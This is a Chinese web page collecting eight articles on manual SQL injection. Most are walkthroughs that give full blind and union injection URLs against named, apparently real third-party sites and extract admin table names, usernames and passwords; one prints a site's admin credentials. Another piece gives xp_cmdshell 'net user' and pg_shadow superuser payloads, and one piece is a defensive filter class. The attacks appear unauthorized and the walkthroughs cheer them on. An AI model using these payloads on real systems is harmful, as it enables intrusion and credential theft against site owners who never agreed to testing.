首页 > 范文大全

某网站安全检测之数据库手工注入脚本安全

时间：2023年05月31日

来源：Continue

编辑：本站小编

收藏本文

下载本文

下面小编为大家带来某网站安全检测之数据库手工注入脚本安全，本文共8篇，希望大家喜欢!本文原稿由网友“Continue”提供。

篇1：某网站安全检测之数据库手工注入脚本安全

一、引子

长夜慢慢，无心睡眠……

无意中翻到几年前听的一首名为《祖先的阴影》的摇滚，这么长久的历史，混合着许多的罪恶与功绩；这么“灿烂的文化”，夹杂着太多的愚昧与文明，美好的，如汉字，围棋古筝，诗词曲赋等；糟糕的，如一辈子只会干“杀尽叛贼、占据王位，选好王妃，建造坟堆”四件事的皇帝及官僚制度，小脚，太监及八股文等等。

噢，且慢，八股文——不要言之过早！今天，让我用八股文这一旧瓶，来包装一下IT方面的新酒；把数据库注入这一有几个年头的安全技术，再写一篇略有新意的文章。

二、概要

所谓数据库注入，也就是SQL Injection，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。来自官方的说法是：“当应用程序使用输入内容来构造动态SQL语句以访问数据库时，会发生SQL注入攻击。如果代码使用存储过程，而这些存储过程作为包含未筛选的用户输入的字符串来传递，也会发生SQL注入攻击。SQL注入可能导致攻击者能够使用应用程序登录在数据库中执行命令。如果应用程序使用特权过高的帐户连接到数据库，这种问题会变得很严重。”在某些表单中，用户输入的内容直接用来构造(或者影响)动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入攻击。而许多网站程序在编写时，没有对用户输入数据的合法性进行判断或者程序中本身的变量处理不当，使应用程序存在安全隐患。这样用户就可以提交一段数据库查询代码，(一般是在浏览器地址栏进行,通过正常的www端口访问)根据程序返回的结果，获得一些敏感的信息或者控制整个服务器，于是SQL注入产生了。其实简单点说，SQL注入的原理就是从客户端提交特殊的代码，从而收集程序及服务器的信息，从而获取你想到得到的资料。

当然，能不能构造、构造什么样的数据库查询代码，就有是菜鸟和高手的区别了；同时我向大伙保证：我绝不是高手——我基本上连数据库都不会用，所以大伙看了文章后不要问我太多太深的问题，因为我也不知道。

三、检测

查找资料的过程中，被链接到某电信技术研究院网站，看了一下首页代码及链接，用and和or简单测试了一下，没发现什么，在最后快要放弃的时候，发现如下页面有点意思。

1=1（不正常）

1=2（也不正常）

加一个特殊符号，则如下图示。

（返回正常）

（返回异常）

嘿嘿，存在注入，心花怒放!

四、暴库

上面就可以知道该网站后台数据库是MS SQL Server。

(select count(*) from [sysobjects])>=0（返回正常，可见数据库为SQL Server）

探测该网站数据库实例名，我很幸运，竟然通过错误暴出来，请看下图。

SQL Server中DB_NAME 最大值是NVARCHAR(128)，我提交错误，网站也报错，看红色下划线处和红色长方形里，可见数据库实例名为jstrd。

五、寻表

漫长而痛苦的工作开始了，同时因为在创建一个数据库的同时，系统会自动建立一些系统表，我构造了如下的语句，来探测数据库实例jstrd中的表名。

限于篇幅的缘故我在这里只介绍与应用实例有关的一个系统表（SYSOBJECTS）及其相关的字段。

表SYSOBJECTS为数据库内创建的每个对象（约束，规则，表，视图，触发器等）创建一条记录。该表相关字段的含义如下：

SYSOBJECTS.name 对象名，如：表名，视图名。

SYSOBJECTS.id 对象id。

SYSOBJECTS.type 对象类型（p存储过程，v视图，s系统表，u用户表）。

太帅了，返回正确，提交的“系统态”语句是：

*/show_products.asp?id=22%27%20and%20%28Select%20count%28%2a%29%20from%20jstrd..%5bsysobjects%5d%20where%20xtype=char%28117%29%20and%20left%28jstrd..%5bsysobjects%5d.name%2c0%29=char%2832%29%20and%20len%28jstrd..%5bsysobjects%5d.name%29%3e0%29%3e0%20and%20%271%27=%271&classid=1

翻译成我们容易识别的“用户态”（以后都用这种形式表示）是：

*/show_products.asp?id=22'and (Select count(*) From jstrd..[sysobjects] where xtype=char(117) and left(jstrd..[sysobjects].name,0)=char(32) and len(jstrd..[sysobjects].name)>0 and abs(ascii(substring(jstrd..[sysobjects].name,1,1)))<=67)>0 and '1'='1&classid=1

或许各位要懵了，这都是些什么东西啊，乱七八糟的？我笑而不答，谜底将在后面揭开。但事先点一下：

xtype是那张表的一个字段，xtype=char(117) 也就是xtype='U' 意思是取用户的表。空格(Space)的ASCII编码是32。

历经多次的失败后，在如下语句输入时，探测到我认为是存储用户名和密码的一张表（之前也探测到别的表，但我认为对自己没有用，

并且要说一下的是当我探测到有TblAd之后，我直觉得加上了TblAdmin；后来发现还没完，有TblAdminUs之后，我直觉得加上了TblAdminUser）。

*/show_products.asp?id=22'and (Select count(*) From jstrd..[sysobjects] where xtype=char(117) and left(jstrd..[sysobjects].name,11)=CHAR(84)+CHAR(98)+CHAR(108)+CHAR(65)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110)+CHAR(85)+CHAR(115)+CHAR(101) and len(jstrd..[sysobjects].name)>11 and abs(ascii(substring(jstrd..[sysobjects].name,12,1)))=114)>0 and '1'='1&classid=1

可见有TblAdminUser这么一张表，我们可以再测试一下，如下图。

and (select count(*) from TblAdminUser)>0

六、探列

各位看到这里，上面的谜底很可能都明白了。什么，还有不明白的！那好，告诉你：网站及后台系统理会我上面所说的“系统态”，不理会“用户态”。你们看看如下两个表。

（部分Unicode编码表）

（部分ASCII编码表）

刚才寻到了表，现在我们的工作是探列了，综合运用上面提到过的知识，加上我的直觉猜测里面应该就有username和password两个列，果然！请看下图。

*/show_products.asp?id=22'and (Select count(*) from jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].username,0)=char(32) and len(jstrd..[TblAdminUser].username)>0)>0 and '1'='1&classid=1

*/show_products.asp?id=22'and (Select count(*) From jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].password,0)=char(32) and len(jstrd..[TblAdminUser].password)>0 and abs(ascii(substring(jstrd..[TblAdminUser].password,1,1)))=106)>0 and '1'='1&classid=1

七、结果

冲锋的号角已经响起，胜利在望；可“行百里者，半于九十”，真正要花大半功夫的地方，也在这。

*/show_products.asp?id=22'%20and%20(Select%20count(*)%20From%20jstrd..[TblAdminUser]%20where%20%20left(jstrd..[TblAdminUser].username,0)=char(32)%20and%20len(jstrd..[TblAdminUser].username)>0%20and%20abs(ascii(substring(jstrd..[TblAdminUser].username,1,1)))=97)>0%20and%20'1'='1&classid=1

可见username列中，第一个字符是a (ASCII编码为97)，很快，就猜测到了是admin。

判断password列中，第一个字符应该在g之后，如下图示。

*/show_products.asp?id=22' (Select count(*) From jstrd..[TblAdminUser] where left(jstrd..[TblAdminUser].password,0)=char(32) and len(jstrd..[TblAdminUser].password)>0 and abs(ascii(substring(jstrd..[TblAdminUser].password,1,1)))>103)>0 and '1'='1&classid=1and

很快，就猜到了是j，呵呵，有点意思。如下图示。

历经千辛万苦后，我终于找到了全部密码，竟然是*********

轻松找到后台，登陆，果然正确！如下图示。

八、尾声

因为这份文档主要侧重数据库手工注入,所以注入成功获得网站控制权后的进一步渗透不作介绍。在这里，是我抛出一块破砖，引大伙收获更多的良玉。个人感觉，注入能成功，得益于以下三点：

1、Unicode编码和ASCII编码的应用；

2、系统会自动建立的系统表sysobjects的应用；

3、db_name最大长度128的应用，加上一些直觉判断。

整个过程，耗了近一个星期的业余时间，此时，又是一个深夜……

夜色沉沉，睡意浓浓。

篇2：手工注入脚本安全

现在注入工具横行,自动化的程度已经...不能再自动了.

很多人会熟练的使用啊D,明小子之类的自动注入工具.以为自己就会了...

注入的原理呢.什么是注入.为什么会造成注入.过程...等.

你知道吗?你有没有试过真正的手工注入?没吧.

现在就利用我写的手工注入工具来讲解一下总体手工注入过程.

先找个有注入漏洞的站.很简单满大街都是.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User

username admin

password bfpms

id 35

已经找好了.这是一个标准欠黑型网站.安全度就不用说了.

www.jinhu168.com/A3/NewsInfo.asp?id=75

有注入漏洞的地址.检查一下.

基本确定可能有漏洞.继续.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

查询manage_User这个表名是否存在.

不好意思.这工具老出错...录制这个工具不怎么好用.有好用的有空介绍个啊....

好了继续.

manage_User 存在...页面返回正常...

名字改了下`不存在就返回错误的页面`

这里是给你填写提示语句用的`不用的话清空就行了.

继续.

返回正常.说明存在.继续.等等`听电话`

不好意思.

不是1位哦`回显错误.呵呵`5位的`回显正常`

这样我们就知道他很多东西了`表..项..还有内容长度.

帐号的第一位的第一个字母不是1所以出错.

呵呵`帐号的第一位的第一个字母是a 正确...所以回显正常.

帐号是什么我想都不用怎么想了吧`5位数的admin

确实是的哦....哈哈.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

为了给大家学习.我把例句都提取出来了.和程序过程是一样的,大家可以研究下.

其他的密码等也是这种过程. 大家明白了吗?要难不是很难`只是要有耐心.如果简单的话就不会出现

全自动的注入工具了.

希望大家在使用我的工具的同时也能学到点东西.

篇3：注入笔记判断数据库脚本安全

前面学习了注入语句和对注入语句的解释，那么很多朋友可能还不会区分和判断注入的网站到底使用的是数据库，那么这节课就来学习利用注入点判断数据库类型，直接进入正题。

我们要让网站报错首先需要去掉浏览器一个设置，否则将看不到报错信息，

设置方法：打开浏览器--工具--internet选项--高级--找到显示有好http错误信息去掉前面对号如图：

做好准备工作后我们就可以进程判断了，否则将不会显示我们想要得到的信息。

我们先来看看access数据库的情况。

我们先在www.zxw114.com.cn/news/news_list.asp?id=35203后面加个单引号(')看看。

出现错误，Microsift JET Databse Ebgine 这里JET就代码是Access数据库的意思。

如果不出现如上错误，我们可以先用sql server的判断看看是否是sql server或判断mysql，如果都不是那么就很有可能是access数据库。

---------------------------------------------------------------------------------------------------------------------------------------------

那么我们接着在来看下SQL Server数据库的报错。

小记：SQL Server也简称为mssql

我们在来看看这个站：www.gwytb.gov.cn/lajm/tzqyxh0.asp?lajm_m_id=60后面加上单引号(')看看。

通用出现错误：Microsoft OLE DB Provider for ODBC Drivers 这里就是mysql数据库的意思，什么？不信？那么我们把这个网址仍到啊D里看一下，

那么如果网站不会报错怎么办，比方比方说我们在此网站输入单引号，内容消失。不出现任何提示，那么我们可以来查询下mssql的内置表来判断，

命令：and exists (select * from sysobjects)--

页面返回正常，说明我们查询到了此表，就可以推断出此网站数据为mssql。如果报错，那么久说明不存在。

我们还可以用and user>0来判断。

小记：user为mssql内置用户组。

一般使用此方法或爆出错误，如：

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '>' 附近有语法错误。

/lajm/tzqyxh0.asp，行 21

------------------------------------------------------------------------------------------------------------------------------

下面我们在来看一下mysql的环境搭建的网站，mysql很少会出现如此的报错，那么我们怎么区分呢，我们可以在网站后面加入/*或/#来判断，如果返回正常那就是mysql

www.runjiapt.cn/product.php?id=11此站位php网站，一般php都随mysql一起搭建。那么我们来看一下

先在网站后面网址后面输入/#

弹出一个窗口，请输入正确ID，那么我们在来看一下/*的结果

返回正常页面。

此方法具体实现原理暂时未找到解答。

篇4：数据库防脚本注入WEB安全

网站安全非常重要，所以一个网站必须要有对攻击的基础防范措施，比如脚本攻击，跨域攻击，数据库注入攻击等，下面分享一个使用的防止数据库Sql脚本注入的使用类

using System;

using System.Collections.Generic;

using System.Text;

namespace NZS.Common

{

public class Filter

{

///

/// 检测是否含有危险字符（防止Sql注入）

///

/// 返回True或false

public static bool HasSqlKeywords(string contents)

{

bool ReturnValue = false;

if (contents.Length >0)

{

string LowerStr = contents.ToLower;

System.Text.RegularExpressions.Regex Rx = new System.Text.RegularExpressions.Regex(RxStr);

ReturnValue = Rx.IsMatch(LowerStr, 0);

}

return ReturnValue;

}

///

/// 过滤 Sql 语句字符串中的注入脚本

///

/// 过滤后的字符串

public static string SqlFilter(string str)

{

str = str.Replace(“””, “‘’”);

//单引号替换成两个单引号

str = str.Replace(“‘”, “‘”);

//半角封号替换为全角封号，防止多语句执行

str = str.Replace(“;”, “；”);

//半角括号替换为全角括号

str = str.Replace(“(“, “（”);

str = str.Replace(“)”, “）”);

///////////////要用正则表达式替换，防止字母大小写得情况////////////////////

//去除执行存储过程的命令关键字

str = str.Replace(“Exec”, “”);

str = str.Replace(“Execute”, “”);

//去除系统存储过程或扩展存储过程关键字

str = str.Replace(“xp_”, “x p_”);

str = str.Replace(“sp_”, “s p_”);

//防止16进制注入

str = str.Replace(“0x”, “0 x”);

return str;

}

篇5：和我一起学PHP手工注入脚本安全

作者:冰的原点[L.S.T]

看了这么多的ASP注入的，各位是不是已经厌倦了ASP方面的注入呢？呵呵，千万不能厌倦呀，只有不断的学习，才不会被别人甩很远的！那么今天就跟着我一起学习下PHP环境下的手工注入吧.

今天的网站是一韩国的站点，注入点我已经找到了，大家如果怕麻烦的话，可以用啊D找下注入点，其实啊D不仅能找出ASP环境下的注入点，而且PHP，ASPX以及JSP的都可以找出来的哦，截张图大家看下，如图1.

其实找注入点这种事对啊D来说还是很容易的，不过接下来的事就得靠我们自己的双手来进行了.回到正文上，我们首先要判断下数据库是不是使用的mysql，在注入点处输入/*,如果正常返回的话就说明是mysql的了，因为mysql数据是支持/*的注释的，如图2,返回正确页面，然后我们得判断下mysql的版本，如果支持union查询就好办多了，我们在注入点处输入如下语句：and ord(mid(version(),1,1))>51/*,返回正常，如图3..说明数据库版本是大于4.0的，也就是说支持union查询的.到这里我们最好先判断下权限，如果是root的话后面的提权就好办多了，我们提交：ord(mid(user(),1,1))=114/*，返回错误，说明不是root的权限，只能老老实实的猜表啦.好，接下来猜它的字段数，利用order by 后面加数字的方法能够很快猜出字段数,例如我提交：www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 10，返回正常，说明字段数大于10的，如图4,继续猜，然后提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 20,返回错误，如图5,说明字段数小于20,接下来就是苦力活了，当我们提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 17正常，而www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 18时错误，说明字段数就是17了，接下来就得猜列名了咯,我们提交：www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*如图6.在网页中显示出的数字中替换成我们的语句,我们继续提交,www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17/*，如图7，出现了版本号和当然数据库用户名了,接下来当然是猜表啦，首先我们想到的当然是admin这个表啦，继续提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回正常，说明存在admin这个表的,接下来就是最关键的地方了，我们得猜下用户名和密码的，提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),username,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回错误，看来不存在username这个列名，接下来就是漫长的猜解过程啦，可是始终没有猜到用户名，不过倒是把ID和密码猜出来的，我提交的语句是这样的：www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),id,passwd,9,10,11,12,13,14,15,16,17%20from%20admin/*，呵呵，暴出来了，如图8

文章到这里就要结束了，其实在乎只是这个过程而已，没有暴出用户名，而且后面的后台也没有找到，所以就只能放一放啦！不过，希望各位叉子能从本文学点东西的话，本文就会有它的价值了！

篇6：数据库安全之SQL注入

很多 web 开发者没有注意到 SQL 查询是可以被篡改的，因而把 SQL 查询当作可信任的命令，殊不知道，SQL 查询可以绕开访问控制，从而绕过身份验证和权限检查。更有甚者，有可能通过 SQL 查询去运行主机操作系统级的命令。

直接 SQL 命令注入就是攻击者常用的一种创建或修改已有 SQL 语句的技术，从而达到取得隐藏数据，或覆盖关键的值，甚至执行数据库主机操作系统命令的目的。这是通过应用程序取得用户输入并与静态参数组合成 SQL 查询来实现的。下面将会给出一些真实的例子。

由于在缺乏对输入的数据进行验证，并且使用了超级用户或其它有权创建新用户的数据库帐号来连接，攻击者可以在数据库中新建一个超级用户。例子 27-2. 一段实现数据分页显示的代码……也可以被用作创建一个超级用户（PostgreSQL系统）。

$offset = $argv[0]; // 注意，没有输入验证！

$query = “SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;”;

$result = pg_query($conn, $query);

一般的用户会点击 $offset 已被斌值的“上一页”、“下一页”的链接。原本代码只会认为 $offset 是一个数值。然而，如果有人尝试把以下语句先经过 urlencode 处理，然后加入URL中的话：

insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd)

select 'crack', usesysid, 't','t','crack'

from pg_shadow where usename='postgres';

那么他就可以创建一个超级用户了。注意那个 0; 只不过是为了提供一个正确的偏移量以便补充完整原来的查询，使它不要出错而已。

注: -- 是 SQL 的注释标记，一般可以使用来它告诉 SQL 解释器忽略后面的语句。

对显示搜索结果的页面下手是一个能得到密码的可行办法。攻击者所要做的只不过是找出哪些提交上去的变量是用于 SQL 语句并且处理不当的。而这类的变量通常都被用于 SELECT 查询中的条件语句，如 WHERE, ORDER BY, LIMIT 和 OFFSET。如果数据库支持 UNION 构造的话，攻击者还可能会把一个完整的 SQL 查询附加到原来的语句上以便从任意数据表中得到密码。因此，对密码字段加密是很重要的。例子 27-3. 显示文章……以及一些密码（任何数据库系统）

$query = “SELECT id, name, inserted, size FROM products

WHERE size = '$size'

ORDER BY $order LIMIT $limit, $offset;”;

$result = odbc_exec($conn, $query);

可以在原来的查询的基础上添加另一个 SELECT 查询来获得密码：

union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from usertable;

假如上述语句（使用 ' 和 --）被加入到 $query 中的任意一个变量的话，那么就麻烦了。

SQL 中的 UPDATE 也会受到攻击。这种查询也可能像上面的例子那样入或附加上另一个完整的请求。但是攻击者更愿意对 SET 子句下手，这样他们就可以更改数据表中的一些数据。这种情况下必须要知道数据库的结构才能修改查询成功进行。可以通过表单上的变量名对字段进行猜测，或者进行暴力破解。对于存放用户名和密码的字段，命名的方法并不多。例子 27-4. 从重设密码……到获得更多权限（任何数据库系统）

$query = “UPDATE usertable SET pwd='$pwd' WHERE uid='$uid';”;

但是恶意的用户会把 ' or uid like'%admin%'; -- 作为变量的值提交给 $uid 来改变 admin 的密码，或者把 $pwd 的值提交为 “hehehe', admin='yes', trusted=100 ”（后面有个空格）去获得更多的权限。这样做的话，查询语句实际上就变成了：

// $uid == ' or uid like'%admin%'; --

$query = “UPDATE usertable SET pwd='...' WHERE uid='' or uid like '%admin%'; --”;

// $pwd == “hehehe', admin='yes', trusted=100 ”

$query = “UPDATE usertable SET pwd='hehehe', admin='yes', trusted=100 WHERE

...;”;

下面这个可怕的例子将会演示如何在某些数据库上执行系统命令，

例子 27-5. 攻击数据库所在主机的操作系统（MSSQL Server）

$query = “SELECT * FROM products WHERE id LIKE '%$prod%'”;

$result = mssql_query($query);

如果攻击提交 a%' exec master..xp_cmdshell 'net user test testpass /ADD' -- 作为变量 $prod的值，那么 $query 将会变成

$query = “SELECT * FROM products

WHERE id LIKE '%a%'

exec master..xp_cmdshell 'net user test testpass /ADD'--”;

$result = mssql_query($query);

MSSQL 服务器会执行这条 SQL 语句，包括它后面那个用于向系统添加用户的命令。如果这个程序是以 sa 运行而 MSSQLSERVER 服务又有足够的权限的话，攻击者就可以获得一个系统帐号来访问主机了。

注: 虽然以上的例子是针对某一特定的数据库系统的，但是这并不代表不能对其它数据库系统实施类似的攻击。使用不同的方法，各种数据库都有可能遭殃。

预防措施

也许有人会自我安慰，说攻击者要知道数据库结构的信息才能实施上面的攻击。没错，确实如此。但没人能保证攻击者一定得不到这些信息，一但他们得到了，数据库有泄露的危险。如果你在用开放源代码的软件包来访问数据库，比如论坛程序，攻击者就很容得到到相关的代码。如果这些代码设计不良的话，风险就更大了。

这些攻击总是建立在发掘安全意识不强的代码上的。所以，永远不要信任外界输入的数据，特别是来自于客户端的，包括选择框、表单隐藏域和 cookie。就如上面的第一个例子那样，就算是正常的查询也有可能造成灾难。

永远不要使用超级用户或所有者帐号去连接数据库。要用权限被严格限制的帐号。

检查输入的数据是否具有所期望的数据格式。PHP 有很多可以用于检查输入的函数，从简单的变量函数和字符类型函数（比如 is_numeric()，ctype_digit()）到复杂的 Perl 兼容正则表达式函数都可以完成这个工作。

如果程序等待输入一个数字，可以考虑使用 is_numeric() 来检查，或者直接使用 settype() 来转换它的类型，也可以用 sprintf() 把它格式化为数字。例子 27-6. 一个实现分页更安全的方法

settype($offset, 'integer');

$query = “SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;”;

// 请注意格式字符串中的 %d，如果用 %s 就毫无意义了

$query = sprintf(“SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET %d;”,

$offset);

使用数据库特定的敏感字符转义函数（比如 mysql_escape_string() 和 sql_escape_string()）把用户提交上来的非数字数据进行转义。如果数据库没有专门的敏感字符转义功能的话 addslashes() 和 str_replace() 可以代替完成这个工作。看看第一个例子，此例显示仅在查询的静态部分加上引号是不够的，查询很容易被攻破。

要不择手段避免显示出任何有关数据库的信心，尤其是数据库结构。参见错误报告和错误处理函数。

也可以选择使用数据库的存储过程和预定义指针等特性来抽象数库访问，使用户不能直接访问数据表和视图。但这个办法又有别的影响。

除此之外，在允许的情况下，使用代码或数据库系统保存查询日志也是一个好办法。显然，日志并不能防止任何攻击，但利用它可以跟踪到哪个程序曾经被尝试攻击过。日志本身没用，要查阅其中包含的信息才行。毕竟，更多的信息总比没有要好。

篇7：注入笔记手工注入字符型注入漏洞脚本安全

今天给大家讲解一下字符型注入点注入，也许很多朋友看到字符型的注入大部分都是放弃此注入去寻找其他数字型注入，因为字符型注入应用的不是很广泛，好了，这里我就来交大家字符型注入，

首先打开localhost:/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包 /很明显，字符型注入，

前几张我们说到了判断字符型注入的语句是' and '1'='1 和' and '1'=2 我们来看看。

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='1 返回正常。

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='2 返回错误。

我们确定了注入点那么我们先看看数字型注入能否在这里使用

先用联合查询 order by

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包+order+by+1 很明显，出错啦，不可使用。

那么再用半猜解查询试试

同样出错。

看来字数字型注入在字符型注入中失效啦，那么我们来试试

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+count(*)+from+Manage_User)>0+and+''=' 返回了正常，说明存在manage_user表。

在sql语句中字符型参数必须用单引号闭合(')否则会出错。所以我们在注入中也先要用单引号来闭合语句。

下面我们来猜字段名。

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(username)+from+Manage_User)>0+and+''=' 返回正常，存在，

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(password)+from+Manage_User)>0+and+''=' 返回正常，存在。

这里我只截一张图。

下面判断一下username中字段长度

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(password)+from+Manage_User)>4+and+''=' 返回正常

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(password)+from+Manage_User)=5+and+''=' 返回正常

密码字段省略。下面进行猜解用户名。

localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+count(*)+from+manage_user+where+asc(mid(username,1))=97)+and+''=' 返回正常，username表中第一位是ascll码97，明文为：a

接着猜解第二位:localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+count(*)+from+manage_user+where+asc(mid(username,2))=100)+and+''='

返回正常，username字段中第二位ASCLL码为100，名为为d

这里之后依次往下猜，最后得到username表中数据为：admin，打开数据库看一下是否一样。

这里说明我们猜解正确。

篇8：Web安全之SQL注入攻击脚本安全

前言： ①这个晨讲我构思了两个星期，但是之前电脑坏了，一直拖到昨天才开始着手准备，时间仓促，

能力有限，不到之处请大家批评指正；

②我尽量将文中涉及的各种技术原理，专业术语讲的更加通俗易懂，但这个前提是诸位能看得懂

基本的 SQL 语句(想想海璐姐你就懂了)；

③本晨讲形式为PPT+个人演讲+实际演示，但因为TTS征文限制，少去了很多效果，深表遗憾;

④原创文章，达内首发，希望喜欢的同学，多多支持！如有疑问致信：chinanala@gmail.com

=============以下是晨讲内容脚本，实战演练部分配以文字说明=============

大家早上好！今天由我给大家带来《 web 安全之 SQL注入篇》系列晨讲，首先对课程进行简单介绍，SQL注入篇一共分为三讲：

第一讲：“纸上谈兵：我们需要在本地架设注入环境，构造注入语句，了解注入原理。”；

第二讲：“实战演练：我们要在互联网上随机对网站进行友情检测，活学活用，举一反三”；

第三讲：“扩展内容：挂马，提权，留门。此讲内容颇具危害性，不予演示。仅作概述”。

这个主题涉及的东西还是比较多的，结合我们前期所学。主要是让大家切身体会一下，管中窥豹，起到知己知彼的作用。千里之堤溃于蚁穴，以后进入单位，从事相关程序开发，一定要谨小慎微。

问：大家知道骇客们攻击网站主要有哪些手法？

SQL注入，旁注，XSS跨站，COOKIE欺骗，DDOS，0day 漏洞，社会工程学等等等等，只要有数据交互，就会存在被入侵风险！哪怕你把网线拔掉，物理隔绝，我还可以利用传感器捕捉电磁辐射信号转换成模拟图像。你把门锁上，我就爬窗户；你把窗户关上，我就翻院墙；你把院墙加高，我就挖地洞。。。道高一尺魔高一丈，我始终坚信计算机不存在绝对的安全，你攻我防，此消彼长，有时候，魔与道只在一念之间。

下面，就让我们一起推开计算机中那另一扇不为人知的门---

一、纸上谈兵

（一）了解注入原理

为什么会存在sql注入呢，只能说SQL出身不好。因为sql作为一种解释型语言，在运行时是由一个运行时组件解释语言代码并执行其中包含的指令的语言。基于这种执行方式，产生了一系列叫做代码注入（code injection）的漏洞。它的数据其实是由程序员编写的代码和用户提交的数据共同组成的。程序员在web开发时，没有过滤敏感字符，绑定变量，导致攻击者可以通过sql灵活多变的语法，构造精心巧妙的语句，不择手段，达成目的，或者通过系统报错，返回对自己有用的信息。

我们在学JDBC和SQL时，讲师跟我们说 Statement不能防止SQL注入, PreparedStatement能够防止SQL注入. 没错, 这句话是没有问题的, 但到底如何进行SQL注入?怎么直观的去了解SQL注入?这还是需要花一定的时间去实验的.预编译语句 java.sql.PreparedStatement ,扩展自 Statement,不但具有 Statement 的所有能力而且具有更强大的功能。不同的是，PreparedStatement 是在创建语句对象的同时给出要执行的sql语句。这样，sql语句就会被系统进行预编译，执行的速度会有所增加，尤其是在执行大语句的时候，效果更加理想。而且PreparedStatement中绑定的sql语句是可以带参数的。

（二）架设注入环境

我们知道现在php作为一门网页编程语言真是风生水起，利用lamp(linux+apache+mysql+php)或者wamp(windows+apache+mysql+php)搭建网站环境，如腾讯的discuz、阿里的 phpwind 以及织梦的dedecms 等建站程序,占据了国内网站的半壁江山。那么我们今天即以这种架构为假象敌，首先是在本地架设wamp环境。需要用到的工具有：apache,mysql,php ，这几个组件可以单独下载安装，不过安装配置过程较为繁琐，还是建议新手直接从网上下载phpnow ，一个绿色程序，包含上述三个组件，傻瓜化操作就可以了。

然后呢，我们要建立测试用的数据表，编写html,php,文件，通过实例具体来演示通过SQL注入，登入后台管理员界面。这里，我之前已经写好了，大家看下：

1.创建一张试验用的数据表：

CREATE TABLE users (

id int(11) NOT NULL AUTO_INCREMENT,

username varchar(64) NOT NULL,

password varchar(64) NOT NULL,

email varchar(64) NOT NULL,

PRIMARY KEY (id),

UNIQUE KEY username (username)

);

添加一条记录用于测试：

INSERT INTO users (username,password,email)

VALUES('tarena',md5('admin'),'tarena@admin.com');

2.接下来，贴上登录界面的源代码：

Sql注入演示

用户名：

密码：

当用户点击提交按钮的时候，将会把表单数据提交给validate.php页面，validate.php页面用来判断用户输入的用户名和密码有没有都符合要求(这一步至关重要，也往往是SQL漏洞所在)。

3.验证模块代码如下：

登录验证

$conn=@mysql_connect(“localhost”,'root','') or die(“数据库连接失败！”);;

mysql_select_db(“injection”,$conn) or die(“您要选择的数据库不存在”);

$name=$_POST['username'];

$pwd=$_POST['password'];

$sql=“select * from users where username='$name' and password='$pwd'”;

$query=mysql_query($sql);

$arr=mysql_fetch_array($query);

if(is_array($arr)){

header(“Location:manager.php”);

}else{

echo “您的用户名或密码输入有误，请重新登录！”;

}

注意到了没有，我们直接将用户提交过来的数据(用户名和密码)直接拿去执行，并没有实现进行特殊字符过滤，待会你们将明白，这是致命的。

代码分析：如果，用户名和密码都匹配成功的话，将跳转到管理员操作界面(manager.php)，不成功，则给出友好提示信息。

（三）演示注入手法

到这里，前期工作已经做好了，我们看这个登录界面，虽说是简陋了点。但具有一般登录认证的功能。普通人看这个不过是一个登录界面，但从攻击者角度来说，透过现象看本质，我们应当意识到隐藏在这个登录页面背后的是一条select 语句---

OK！接下来将展开我们的重头戏：SQL注入

填好正确的用户名(tarena)和密码(admin)后，点击提交，将会返回给我们“欢迎管理员”的界面。

因为根据我们提交的用户名和密码被合成到SQL查询语句当中之后是这样的：

select * from users where username='tarena' and password=md5('admin')

很明显，用户名和密码都和我们之前给出的一样，肯定能够成功登陆。但是，如果我们输入一个错误的用户名或密码呢?很明显，肯定登入不了吧。恩，正常情况下是如此，但是对于有SQL注入漏洞的网站来说，只要构造个特殊的“字符串”，照样能够成功登录。

